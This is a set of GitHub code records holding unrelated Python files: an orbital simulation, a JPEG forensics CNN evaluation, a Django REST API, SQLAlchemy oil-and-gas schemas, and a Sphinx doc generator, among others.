neptune: 12\n}\n\n\n\n# Define a function that will compute the derivatives of the position and velocity\ndef compute_derivatives(y, t, bodies):\n n = len(bodies)\n result = np.zeros((n, 6))\n positions = y.reshape(n, 6)\n\n # Loop over all bodies and calculate the acceleration due to all other bodies\n for i in range(n):\n body1 = bodies[i]\n r1 = positions[i, :3]\n v1 = positions[i, 3:]\n \n a = np.zeros(3) # acceleration\n for j in range(n):\n if i != j:\n body2 = bodies[j]\n r2 = positions[j, :3]\n r = np.linalg.norm(r2 - r1)\n a += G * body2.mass * (r2 - r1) / r**3\n\n result[i, :3] = v1 # derivative of position is velocity\n result[i, 3:] = a # derivative of velocity is acceleration\n\n return result.reshape(6*n)\n\n# Combine all the positions and velocities into a single array to use as initial conditions\ny0 = np.zeros((len(bodies), 6))\nfor i, body in enumerate(bodies):\n y0[i, :3] = body.position\n y0[i, 3:] = body.velocity\ny0 = y0.reshape(6*len(bodies))\n\n# Define the times for which we want the solution: from t=0 to t=3.154e7 (1 year) with 2000 points in-between\n# t = np.linspace(0, 3.154e7, 12)\nt = np.linspace(0, 10 * 3.154e7, 3650)\n\n# Solve the system of differential equations\nsolution = odeint(compute_derivatives, y0, t, args=(bodies,))\n\nmax_distance = max(np.linalg.norm(body.position) for body in bodies)\n\n\n# Set up the figure with a specific size (10x10 in this case)\nfig, ax = 
plt.subplots(figsize=(10, 10)) # You can adjust the size to fit your needs\nax.set_xlim(-max_distance*1.2, max_distance*1.2)\nax.set_ylim(-max_distance*1.2, max_distance*1.2)\nax.set_aspect('equal', adjustable='box')\n\ntime_text = ax.text(0.02, 0.95, '', transform=ax.transAxes)\n\n# Create a plot object for each body and a trail (line) for each body\npoints = [plt.plot([], [], color=body.color, marker='o', markersize=size_dict.get(body, 10))[0] for body in bodies]\nlines = [plt.plot([], [], color=body.color)[0] for body in bodies]\n\n# Initialize the plot objects\ndef init():\n    for point, line in zip(points, lines):\n        point.set_data([], [])\n        line.set_data([], [])\n    \n    time_text.set_text('') # Set the initial timestamp to empty\n    return points + lines + [time_text] # Add time_text to the returned objects\n\n# Update function to draw each frame in the animation\ndef update(i):\n    year = i // 365 # Calculate the current year (~365 frames per year: t spans 10 years over 3650 frames)\n\n    # Update the time legend\n    time_text.set_text('Year: {}'.format(year))\n\n    for j, (point, line) in enumerate(zip(points, lines)):\n        x = solution[:i+1, j*6]\n        y = solution[:i+1, j*6+1]\n        point.set_data([x[-1]], [y[-1]]) # update the position of the body in the current frame (wrapped in lists: newer Matplotlib requires sequences)\n        line.set_data(x, y) # update the trail of the body with all previous positions\n    return points + lines + [time_text] # Add time_text to the returned objects\n\n\n# Create an animation\nani = FuncAnimation(fig, update, frames=range(0, len(t), 1), init_func=init, blit=True)\n\nplt.show() # display the animation\n","repo_name":"deanosmith/Astro","sub_path":"solar_system/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33877422915","text":"\"\"\"\n    2020 Department of Information Engineering and Mathematics, University of Siena, Italy.\n\n    Authors: Andrea Costanzo (andreacos82@gmail.com) and Benedetta Tondi\n\n    This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public\n    License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later\n    version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the\n    implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for\n    more details. 
You should have received a copy of the GNU General Public License along with this program.\n If not, see .\n\n If you are using this software, please cite:\n\n Boosting CNN-based primary quantization matrix estimation of double JPEG images via a classification-like architecture}, \n Benedetta Tondi and Andrea Costanzo and Dequ Huang and Bin Li\n ArXiv preprint: https://arxiv.org/abs/2012.00468\n\n\"\"\"\n\nimport configuration as cfg\nimport os\nimport numpy as np\nfrom batch import evaluate_model_v20, evaluate_model\nfrom utils import plot_average_accuracy, rearrange_zigzag_array, read_dataset_wfilter_jpeg_grid, qf1_qf2_coefficients_map, max_min_coefficient\nfrom networks import custom_categorical, custom_softmax_activation, custom_two_terms_loss_wrapper, custom_mse_wrapper\nfrom tensorflow.keras.models import load_model\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"3\"\n\n\nif __name__ == '__main__':\n\n save_figures = False\n save_data = False\n suppress_csv = True\n\n # Version 2 has two-terms loss, version 1 has one-term loss\n version = '1.0' # 2.0\n mode = 'aligned' # 'misaligned'\n\n # Test model\n if version == '2.0':\n\n used_cnn = 'new_model'\n model_file = 'models/model_QF1_60-98-s1-2-term-loss-from-86+20+4+30+ep-30-coef-15/model_ep29.h5'\n # model_file = 'models/model_QF1_55-98-s1-2-term-loss-from-86+53-ep-30-coef-15/model_ep29.h5'\n output_txt = 'results/results_QF1_60-98-s1-2-term-loss-from-86+20+4+30+ep-30-coef-15/RAISE8K_accuracies_{}_{}.txt'.format(mode.upper(), used_cnn)\n # output_txt = 'results/results_QF1_55-98-s1-2-term-loss-from-86+53-ep-30-coef-15/QF2_80_RAISE8K_MIXED_DATASET_accuracies_{}_{}.txt'.format(mode.upper(), used_cnn)\n\n elif version == '1.0':\n\n used_cnn = 'old_model'\n model_file = 'models/model_OriginalPaperModels/DNN90_60LOG.h5'\n # model_file = 'models/model_OriginalPaperModels/DNN80_LC20_From90.h5'\n output_txt = 'results/results_OriginalPaperModels/RAISE8K_QF1<>QF2_accuracies_{}_{}.txt'.format(mode.upper(), used_cnn)\n # output_txt = 'results/results_OriginalPaperModels/QF2_80_RAISE8K_MIXED_DATASET_accuracies_{}_{}.txt'.format(mode.upper(), used_cnn)\n\n # Output NPY for average accuracy for each coefficient\n per_coeff_acc_file = 'QF2_90_RAISE8K_Average_accuracy_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n per_coeff_mse_file = 'QF2_90_RAISE8K_Average_mse_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n\n per_coeff_acc_file_1 = 'QF2_90_RAISE8K_QF1_smaller_QF2_Average_accuracy_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n per_coeff_acc_file_2 = 'QF2_90_RAISE8K_QF1_larger_QF2_Average_accuracy_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n\n per_coeff_mse_file_1 = 'QF2_90_RAISE8K_QF1_smaller_QF2_Average_mse_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n per_coeff_mse_file_2 = 'QF2_90_RAISE8K_QF1_larger_QF2_Average_mse_overall_coeff_{}_{}.npy'.format(mode.upper(), used_cnn)\n\n # Data file\n csv_file = os.path.join(cfg.out_test_dir, cfg.test_csv)\n\n # Load the table linking each pair of JPEG quality factors to the corresponding Q's coefficients\n qf_map = qf1_qf2_coefficients_map(csv_file=csv_file)\n\n # Max value for coefficients\n max_coeffs, _ = max_min_coefficient(quality_range=(50, 100),\n n_coeffs=cfg.max_no_Q_coefs,\n zig_zag_order=cfg.zig_zag_order)\n\n # Load model\n if version == '1.0':\n model = load_model(model_file,\n custom_objects=({'custom_softmax': custom_softmax_activation(max_coeffs),\n 'custom_categorical': 
custom_categorical(max_coeffs)}))\n elif version == '2.0':\n model = load_model(model_file,\n custom_objects=({'custom_softmax': custom_softmax_activation(max_coeffs),\n 'custom_two_terms_loss_wrapper': custom_two_terms_loss_wrapper(max_coeffs, cfg.mse_weight),\n 'custom_mse': custom_mse_wrapper(max_coeffs)}))\n\n # Read CSV with test dataset for each (QF1, QF2) pair and gris is aligned / misaligned\n arr_accuracy = []\n arr_mse = []\n arr_nmse = []\n\n avg_acc_matrix = np.zeros((1, cfg.max_no_Q_coefs))\n avg_acc_matrix_1 = np.zeros((1, cfg.max_no_Q_coefs))\n avg_acc_matrix_2 = np.zeros((1, cfg.max_no_Q_coefs))\n\n avg_mse_matrix = np.zeros((1, cfg.max_no_Q_coefs))\n avg_mse_matrix_1 = np.zeros((1, cfg.max_no_Q_coefs))\n avg_mse_matrix_2 = np.zeros((1, cfg.max_no_Q_coefs))\n\n tot_pairs_smaller = 0\n tot_pairs_larger = 0\n tot_pairs_with_values = 0\n for qf_pair in cfg.q_factors:\n\n test_images, test_labels, test_jpeg_pairs = read_dataset_wfilter_jpeg_grid(csv_file=csv_file,\n qf_filter=qf_pair,\n grid_filter=mode)\n print('Found {} {} images'.format(len(test_images), mode))\n if len(test_images) == 0:\n print('WARNING! NO RECORD FOR {}, {}'.format(qf_pair[0], qf_pair[1]))\n arr_accuracy.append(-1)\n arr_mse.append(-1)\n arr_nmse.append(-1)\n with open(output_txt, 'a') as fp:\n fp.write('-' * 80 + '\\n')\n fp.write('QF1 = {} QF2 = {}\\n'.format(qf_pair[0], qf_pair[1]))\n fp.write('-' * 80 + '\\n')\n fp.write('Test average MSE: {:3.4f}\\n'.format(-1))\n fp.write('Test average normalised MSE: {:3.4f}\\n'.format(-1))\n fp.write('Test accuracy: {:3.4f}\\n'.format(-1))\n fp.write('-'*80 + '\\n')\n fp.write('\\n')\n continue\n else:\n tot_pairs_with_values+=1\n\n # Test model performance\n csv_output = 'results/test_results_{}_{}_{}.csv'.format(mode.upper(), qf_pair[0], qf_pair[1])\n\n print('Version: {}'.format(version))\n if version == '2.0':\n eval_fun = evaluate_model_v20\n else:\n eval_fun = evaluate_model\n\n avg_mse, avg_nmse, test_accuracy, accuracy_matrix, mse_matrix = \\\n eval_fun(model=model,\n images=test_images,\n labels=test_labels,\n qfactors=test_jpeg_pairs,\n qf_map=qf_map,\n target_size=cfg.block_size,\n max_samples=None,\n coeff_map=max_coeffs,\n csv_companion=csv_output)\n\n # If we do not need the CSV files\n if suppress_csv:\n os.remove(csv_output)\n\n # store data for each pair to average later over all QFs\n arr_accuracy.append(test_accuracy)\n arr_mse.append(avg_mse)\n arr_nmse.append(avg_nmse)\n\n avg_acc_matrix += accuracy_matrix\n avg_mse_matrix += mse_matrix\n\n if qf_pair[0] < qf_pair[1]:\n tot_pairs_smaller += 1\n avg_acc_matrix_1 += accuracy_matrix\n avg_mse_matrix_1 += mse_matrix\n else:\n tot_pairs_larger += 1\n avg_acc_matrix_2 += accuracy_matrix\n avg_mse_matrix_2 += mse_matrix\n\n\n # Plot average accuracy (over all images) for each coefficient\n # if save_figures:\n # plot_file_acc = 'results/acc_x_coeff_{}_{}_{}.png'.format(mode.upper(), qf_pair[0], qf_pair[1])\n # plot_average_accuracy(rearrange_zigzag_array(accuracy_matrix, 8), savefile=plot_file_acc)\n\n # if save_data:\n # np.save('accuracy_{}_{}.npy'.format(mode.upper(), qf_pair[1]), arr_accuracy)\n\n print('JPEG: {} QF1 = {} QF2 = {}'.format(mode.upper(), qf_pair[0], qf_pair[1]))\n print('Test average MSE: {:3.4f}'.format(avg_mse))\n print('Test average normalised MSE: {:3.4f}'.format(avg_nmse))\n print('Test accuracy: {:3.4f}'.format(test_accuracy))\n print('\\n')\n\n with open(output_txt, 'a') as fp:\n fp.write('-' * 80 + '\\n')\n fp.write('QF1 = {} QF2 = {}\\n'.format(qf_pair[0], qf_pair[1]))\n 
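# metrics for this (QF1, QF2) pair, mirroring the console printout above\n            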
fp.write('-' * 80 + '\\n')\n fp.write('Test average MSE: {:3.4f}\\n'.format(avg_mse))\n fp.write('Test average normalised MSE: {:3.4f}\\n'.format(avg_nmse))\n fp.write('Test accuracy: {:3.4f}\\n'.format(test_accuracy))\n fp.write('-'*80 + '\\n')\n fp.write('\\n')\n\n # Average coefficient accuracy / MSE over all (QF1, QF2) pairs\n avg_acc_matrix = avg_acc_matrix / tot_pairs_with_values\n avg_mse_matrix = avg_mse_matrix / tot_pairs_with_values\n\n avg_acc_matrix_1 = avg_acc_matrix_1 / tot_pairs_smaller\n avg_mse_matrix_1 = avg_mse_matrix_1 / tot_pairs_smaller\n\n avg_acc_matrix_2 = avg_acc_matrix_2 / tot_pairs_larger\n avg_mse_matrix_2 = avg_mse_matrix_2 / tot_pairs_larger\n\n np.save(per_coeff_acc_file, avg_acc_matrix)\n np.save(per_coeff_mse_file, avg_mse_matrix)\n\n np.save(per_coeff_acc_file_1, avg_acc_matrix_1)\n np.save(per_coeff_mse_file_1, avg_mse_matrix_1)\n\n np.save(per_coeff_acc_file_2, avg_acc_matrix_2)\n np.save(per_coeff_mse_file_2, avg_mse_matrix_2)\n","repo_name":"andreacos/BoostingCNN-Jpeg-Primary-Quantization-Matrix-Estimation","sub_path":"predict_alignment.py","file_name":"predict_alignment.py","file_ext":"py","file_size_in_byte":9998,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33564694166","text":"import requests\nimport json\n\n\nclass Schema:\n def __init__(\n self,\n gc2\n ):\n self.__gc2 = gc2\n self.__url = f\"{gc2.url}/schema\"\n self.data = None\n\n def get(self):\n resp = requests.get(f\"{self.__url}\", headers=self.__gc2.headers)\n if resp.status_code != 200:\n raise Exception(f\"Error {resp.status_code}: {resp.text}\")\n else:\n self.data = json.loads(resp.text)[\"data\"]\n return\n","repo_name":"mapcentia/gc2-python-client","sub_path":"gc2/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72702913768","text":"from urllib import request\nfrom django.db.models import Q\nfrom rest_framework.decorators import action\nfrom rest_framework import permissions, viewsets, status\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework_simplejwt import views\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework_simplejwt.exceptions import TokenError, InvalidToken\n\nfrom restapi.models import Project, Comment, User\nfrom restapi.permissions import IsOwnerOrReadOnly, IsProjectUser\nfrom restapi.serializers import ProjectSerializer, CommentSerializer, UserSerializer, LoginSerializer, RegisterSerializer, PasswordSerializer\n\nfrom django.views import View\nfrom django.http import HttpResponse, HttpResponseNotFound\nimport os, sys\nimport datetime\n\n\nclass LoginViewSet(viewsets.ModelViewSet, views.TokenObtainPairView):\n serializer_class = LoginSerializer\n permission_classes = (AllowAny,)\n http_method_names = ['post']\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n\n try:\n serializer.is_valid(raise_exception=True)\n except TokenError as e:\n raise InvalidToken(e.args[0])\n\n return Response(serializer.validated_data, status=status.HTTP_200_OK)\n\n\nclass RegistrationViewSet(viewsets.ModelViewSet, views.TokenObtainPairView):\n serializer_class = RegisterSerializer\n permission_classes = (AllowAny,)\n http_method_names = ['post']\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n\n 
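# raise_exception=True makes DRF turn validation failures into an HTTP 400\n        # response via its exception handler, so no manual error branch is needed\n        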
serializer.is_valid(raise_exception=True)\n user = serializer.save()\n refresh = RefreshToken.for_user(user)\n res = {\n \"refresh\": str(refresh),\n \"access\": str(refresh.access_token),\n }\n\n return Response({\n \"user\": serializer.data,\n \"refresh\": res[\"refresh\"],\n \"token\": res[\"access\"]\n }, status=status.HTTP_201_CREATED)\n\n\nclass RefreshViewSet(viewsets.ViewSet, views.TokenRefreshView):\n permission_classes = (AllowAny,)\n http_method_names = ['post']\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n\n try:\n serializer.is_valid(raise_exception=True)\n except TokenError as e:\n raise InvalidToken(e.args[0])\n\n return Response(serializer.validated_data, status=status.HTTP_200_OK)\n\n\nclass ProjectViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated, IsProjectUser)\n serializer_class = ProjectSerializer\n queryset = Project.objects.all()\n\n @action(detail=True, methods=['post'])\n def add_comment(self, request, pk=None):\n project = self.get_object()\n owner = request.user\n content = request.data['description']\n comment = Comment(project=project, owner=owner, created=datetime.datetime.now(), content=content)\n comment.save()\n queryset = Project.objects.get(id=project.id)\n serializer = ProjectSerializer(queryset)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def perform_create(self, serializer):\n serializer.save(owner=self.request.user)\n\n def list(self, request, *args, **kwargs):\n queryset = Project.objects.filter(Q(owner=request.user.id) | Q(users__user=request.user.id)).distinct()\n serializer = ProjectSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated, IsOwnerOrReadOnly)\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n\n def perform_create(self, serializer):\n serializer.save(owner=self.request.user)\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n permission_classes = (permissions.IsAuthenticated, IsOwnerOrReadOnly)\n queryset = User.objects.all()\n serializer_class = UserSerializer \n\n @action(detail=True, methods=['post'])\n def set_password(self, request, pk=None):\n user = self.get_object()\n serializer = PasswordSerializer(data=request.data)\n if serializer.is_valid():\n user.set_password(serializer.validated_data['password'])\n user.save()\n return Response({'status': 'password set'})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n# Add this CBV\nclass Assets(View):\n\n def get(self, _request, filename):\n path = os.path.join(os.path.dirname(__file__), 'static', filename)\n\n if os.path.isfile(path):\n with open(path, 'rb') as file:\n return HttpResponse(file.read(), content_type='application/javascript')\n else:\n return HttpResponseNotFound()","repo_name":"GredziszewskiK/3xp","sub_path":"restapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74716461287","text":"import copy\n\ndef menu():\n print(\"MENU\")\n while(True):\n print(\"Indique operacion:\")\n print( \"1) SIMULAR ENCRIPTAR CONJUNTO DE MENSAJES.\\n\"\n \"2) SIMULAR RECIBIR Y DESENCRIPTAR CONJUNTO DE MENSAJES.\\n\"\n \"3) VER ESTADO ACTUAL.\\n\"\n \"4) REINICIAR\\n\"\n \"0) SALIR.\\n\")\n op = input(\"\\t\")\n if op not in (\"1\",\"2\",\"3\",\"4\",\"0\"):\n 
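# invalid choice: warn and loop back to show the menu again\n            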
print(\"ERROR - Seleccion erronea. REINTENTAR\")\n continue\n else:\n return op\n\ndef control_msg(msg: str):\n '''\n Controls that each bracket has its complementary bracket (at the \n correct order)\n ex: {msg} returns True\n {{msg} returns False\n {msg{msg} } returns False\n {msg}{msg} returns True\n '''\n bracket_opened = False\n for x in msg:\n if x == \"{\" and bracket_opened == False:\n bracket_opened = True\n elif x == \"{\" and bracket_opened == True:\n print(\"Uso incorrecto de caracter '{'\")\n return False\n if x == \"}\" and bracket_opened == False:\n print(\"Uso incorrecto de caracter '}'\")\n return False\n elif x == \"}\" and bracket_opened == True:\n bracket_opened = False\n if x == \"&\" and bracket_opened == True:\n print(\"Uso incorrecto de caracter '&'.\")\n return False\n if bracket_opened == False:\n return True\n else:\n print(\"Uso incorrecto de caracter '{'\")\n return False\n\ndef encrypt():\n user_counter = msg_counter = 1\n msg_aux1 = msg_final = \"\"\n while(True):\n print(f\"USUARIO {user_counter} INGRESE SU MENSAJE {msg_counter}:\"\n \" (NO USE LOS CARACTERES '{', '}' NI '&'\")\n msg_temp = input(\"\\t\")\n if \"{\" in msg_temp or \"}\" in msg_temp or \"&\" in msg_temp:\n print(\"Mensaje invalido. Reintentar\")\n continue\n msg_temp = \"{\" + msg_temp + \"}\"\n msg_aux1 = msg_aux1 + msg_temp\n print(\"Desea agregar otro mensaje? (ENTER para SI, 'N' para NO)\")\n if input(\"\\t\").upper() == 'N':\n user_counter+=1\n msg_counter = 1\n msg_final = msg_final + msg_aux1 \n print(\"Desea agregar otros mensajes para otro usuario?\"\n \" (ENTER para SI, 'N' para NO)\")\n if input(\"\\t\").upper() == 'N':\n # tuple_aux = msg_final.rpartition(\"&\")\n # msg_final = tuple_aux[0] # deletes last '&'\n print(\"MENSAJE/S ENCRIPTADO CORRECTAMENTE\")\n print(f\"Mensaje/s: \\n\\t{msg_final}\")\n return msg_final, True\n msg_final = msg_final + \"&\"\n msg_aux1 = \"\"\n else:\n msg_counter += 1\n\ndef decrypt(encrypted_msg: str):\n if not control_msg(encrypted_msg):\n print(\"EL MENSAJE ESTA CORROMPIDO\")\n return False\n list_encrypted_msg = encrypted_msg.split(\"&\")\n print(f\"Hay {len(list_encrypted_msg)} usuarios con mensajes encriptados.\")\n view_list = copy.deepcopy(list_encrypted_msg)\n i=0\n for user_encrp_msgs in view_list:\n i+=1\n message_aux = user_encrp_msgs.replace(\"{\",\"\")\n message_aux = message_aux.split(\"}\")\n message_aux.pop()\n #messages = user_encrp_msgs.partition(\"}\")\n print(f\"Usuario {i}: posee {len(message_aux)} mensajes.\")\n print(f\"Esos mensajes son: {message_aux}\")\n return False","repo_name":"AlexisRmnk/practicaInformatorio2022","sub_path":"prog_web/01_python/practicas_01_informatorio/ejercicios_complementarios/04_listas_tuplas_diccionarios/mas_complicado/ej_f/def_ej_f.py","file_name":"def_ej_f.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30644072399","text":"from turtle import *\nimport math\n\n# Name your Turtle.\nt = Turtle()\n\n# Set Up your screen and starting position.\nsetup(500,300)\nx_pos = -250\ny_pos = -150\nt.setposition(x_pos, y_pos)\n\n### Write your code below:\n\n\n\n\n\n\n# Close window on click.\nexitonclick()\n","repo_name":"GirlsFirst/SIP-2017-starter","sub_path":"Unit1_Foundations/shapes2/pythonshapes_starter.py","file_name":"pythonshapes_starter.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} 
+{"seq_id":"43651543192","text":"from ftxdata import getftxdata\n\nclass Coin():\n def __init__(self, ticker):\n self.__data = getftxdata('https://ftx.com/api/futures/' + ticker)\n self.__ticker = ticker\n self.__price = self.__data['mark']\n self.__percent = str(round(self.__data['change24h']*100, 2)) + '%'\n\n def get(self, attribute):\n if attribute == 'ticker':\n return self.__ticker\n elif attribute == 'price':\n return self.__price\n elif attribute == '%':\n return self.__percent\n else:\n return self.__data","repo_name":"titopotito/cryptofuturesGUI","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8047028679","text":"from sqlalchemy import (\n Table,\n Column,\n Integer,\n String,\n MetaData,\n Float,\n Date,\n)\nfrom sqlalchemy import create_engine\n\n#%% Table names\nOIL_PROD_TABLE = \"oil_production\"\nGAS_PROD_TABLE = \"gas_production\"\nLEASE_TABLE = \"lease\"\nWELLS_TABLE = \"wells\"\nTOPS_TABLE = \"tops\"\n#%% Specify columns to drop from the data sources\nDROP_PROD_COLS = [\n \"LEASE\",\n \"DOR_CODE\",\n \"API_NUMBER\",\n \"FIELD\",\n \"PRODUCING_ZONE\",\n \"OPERATOR\",\n \"COUNTY\",\n \"TOWNSHIP\",\n \"TWN_DIR\",\n \"RANGE\",\n \"RANGE_DIR\",\n \"SECTION\",\n \"SPOT\",\n \"LATITUDE\",\n \"LONGITUDE\",\n \"PRODUCT\",\n \"URL\",\n]\n\nDROP_LEASE_COLS = [\n \"TOWNSHIP\",\n \"TWN_DIR\",\n \"RANGE\",\n \"RANGE_DIR\",\n \"SECTION\",\n \"SPOT\",\n]\n\nDROP_WELL_COLS = [\n \"TOWNSHIP\",\n \"TWN_DIR\",\n \"RANGE\",\n \"RANGE_DIR\",\n \"SECTION\",\n \"SPOT\",\n \"FEET_NORTH\",\n \"FEET_EAST\",\n \"FOOT_REF\",\n \"IP_OIL\",\n \"IP_GAS\",\n \"IP_WATER\",\n \"OIL_KID\",\n \"OIL_DOR_ID\",\n \"GAS_KID\",\n \"GAS_DOR_ID\",\n \"KCC_PERMIT\",\n]\n\nDROP_TOPS_COLS = [\n \"API_NUMBER\",\n \"API_NUM_NODASH\",\n \"ELEVATION\",\n \"ELEV_REF\",\n]\n#%% Create the oil_production table\nmeta = MetaData()\noil_production = Table(\n OIL_PROD_TABLE,\n meta,\n Column(\"LEASE_KID\", Integer, primary_key=True),\n Column(\"DATE\", Date, primary_key=True),\n Column(\"WELLS\", Integer),\n Column(\"PRODUCTION\", Float),\n)\n#%% Create the gas_production table\ngas_production = Table(\n GAS_PROD_TABLE,\n meta,\n Column(\"LEASE_KID\", Integer, primary_key=True),\n Column(\"DATE\", Date, primary_key=True),\n Column(\"WELLS\", Integer),\n Column(\"PRODUCTION\", Float),\n)\n#%% Create the lease table\nlease = Table(\n LEASE_TABLE,\n meta,\n Column(\"LEASE_KID\", Integer, primary_key=True),\n Column(\"LEASE\", String),\n Column(\"DOR_CODE\", Integer),\n Column(\"API_NUMBER\", String),\n Column(\"OPERATOR\", String),\n Column(\"COUNTY\", String),\n Column(\"LATITUDE\", Float),\n Column(\"LONGITUDE\", Float),\n Column(\"PRODUCES\", String),\n Column(\"PRODUCTION\", Float),\n Column(\"YEAR_START\", Integer),\n Column(\"YEAR_STOP\", Integer),\n Column(\"URL\", String),\n)\n#%% Create wells table\nwells = Table(\n WELLS_TABLE,\n meta,\n Column(\"KID\", Integer, primary_key=True),\n Column(\"API_NUMBER\", String),\n Column(\"API_NUM_NODASH\", String),\n Column(\"LEASE\", String),\n Column(\"WELL\", String),\n Column(\"FIELD\", String),\n Column(\"LATITUDE\", Float),\n Column(\"LONGITUDE\", Float),\n Column(\"LONG_LAT_SOURCE\", String),\n Column(\"ORIG_OPERATOR\", String),\n Column(\"CURR_OPERATOR\", String),\n Column(\"ELEVATION\", Float),\n Column(\"ELEV_REF\", String),\n Column(\"DEPTH\", Float),\n Column(\"FORMATION_AT_TOTAL_DEPTH\", String),\n Column(\"PRODUCE_FORM\", 
String),\n Column(\"PERMIT\", Date),\n Column(\"SPUD\", Date),\n Column(\"COMPLETION\", Date),\n Column(\"PLUGGING\", Date),\n Column(\"MODIFIED\", Date),\n Column(\"STATUS\", String),\n Column(\"STATUS2\", String),\n Column(\"COMMENTS\", String),\n)\n#%% Create tops table\ntops = Table(\n TOPS_TABLE,\n meta,\n Column(\"KID\", Integer, primary_key=True),\n Column(\"FORMATION\", String, primary_key=True),\n Column(\"LONGITUDE\", Float),\n Column(\"LATITUDE\", Float),\n Column(\"TOP\", Float),\n Column(\"BASE\", Float),\n Column(\"SOURCE\", String),\n Column(\"UPDATED\", Date),\n Column(\"OLD_FORMATION\", String),\n)\n","repo_name":"Energy-DVA/energy","sub_path":"_1_analysis/db_schema.py","file_name":"db_schema.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72271452967","text":"import argparse\nimport os\nimport re\n\nimport yaml\nfrom easydict import EasyDict as edict\nfrom termcolor import cprint\n\n__all__ = [\n \"api_generator\",\n]\n\ntitle_list = [\"=\", \"-\", \"^\", \"*\"]\nmax_depth_title = 3\n\n\ndef add_title_to_write_msg(write_msg, this_title, title_msg):\n write_msg.append(this_title + \"\\n\")\n write_msg.append(\"\".join(title_msg * len(this_title)) + \"\\n\")\n write_msg.append(\"\\n\")\n return write_msg\n\n\ndef add_to_write_api(write_api, currentmodule, miss_in_path):\n api_str1 = \".. automodule:: \"\n api_str2 = \" :members:\"\n api_str3 = \" :exclude-members: \"\n write_api.append(api_str1 + currentmodule + \"\\n\")\n write_api.append(api_str2 + \"\\n\")\n if len(miss_in_path):\n write_api.append(api_str3 + (\", \".join(miss_in_path)) + \"\\n\")\n write_api.append(\"\\n\")\n return write_api\n\n\ndef add_to_write_msg(write_msg, currentmodule, keep_in_all):\n module_str1 = \".. py:currentmodule:: \"\n module_str2 = \".. 
autosummary::\"\n module_str3 = \" :nosignatures:\"\n write_msg.append(module_str1 + currentmodule + \"\\n\")\n write_msg.append(\"\\n\")\n write_msg.append(module_str2 + \"\\n\")\n write_msg.append(module_str3 + \"\\n\")\n write_msg.append(\"\\n\")\n for module in keep_in_all:\n write_msg.append(\" \" + module + \"\\n\")\n write_msg.append(\"\\n\")\n return write_msg\n\n\ndef search_dir_files(\n path, title_pro, miss_dir, write_msg, write_api, first_flag=False\n):\n all_dir_file = os.listdir(path)\n dirs = []\n files = []\n for item in all_dir_file:\n if item in miss_dir:\n continue\n if os.path.isfile(os.path.join(path, item)):\n files.append(item)\n else:\n dirs.append(item)\n\n path_split = path.split(\"/\")\n cap_idx = path_split.index(\"cap\")\n currentmodule = \".\".join(path_split[cap_idx:])\n dirs_keep = []\n miss_in_path = []\n\n this_title = path_split[-1]\n if first_flag:\n this_title = this_title.capitalize()\n\n if title_pro > max_depth_title:\n title_pro = max_depth_title\n this_title = \".\".join(path_split[cap_idx + max_depth_title :])\n title_msg = title_list[title_pro]\n\n if \"__init__.py\" in files:\n init_infos = open(os.path.join(path, \"__init__.py\"), \"r\").readlines()\n in_all_flag = False\n keep_in_all = []\n num_flag = 0\n for init_info in init_infos:\n if \"__all__\" in init_info:\n in_all_flag = True\n if in_all_flag:\n num_flag += init_info.count(\"[\")\n num_flag -= init_info.count(\"]\")\n\n init_info_strip = init_info.strip()\n init_info_strip = re.findall('[\"](.*?)[\"]', init_info_strip)\n for init_info_tmp in init_info_strip:\n if init_info_tmp not in miss_dir:\n if init_info_tmp not in dirs:\n keep_in_all.append(init_info_tmp)\n else:\n dirs_keep.append(init_info_tmp)\n else:\n miss_in_path.append(init_info_tmp)\n\n if num_flag == 0:\n in_all_flag = False\n\n if len(keep_in_all) or first_flag:\n add_title_to_write_msg(write_msg, this_title, title_msg)\n\n if len(keep_in_all):\n currentmodule = \".\".join(path_split[cap_idx:])\n\n if currentmodule not in write_api:\n add_to_write_api(write_api, currentmodule, 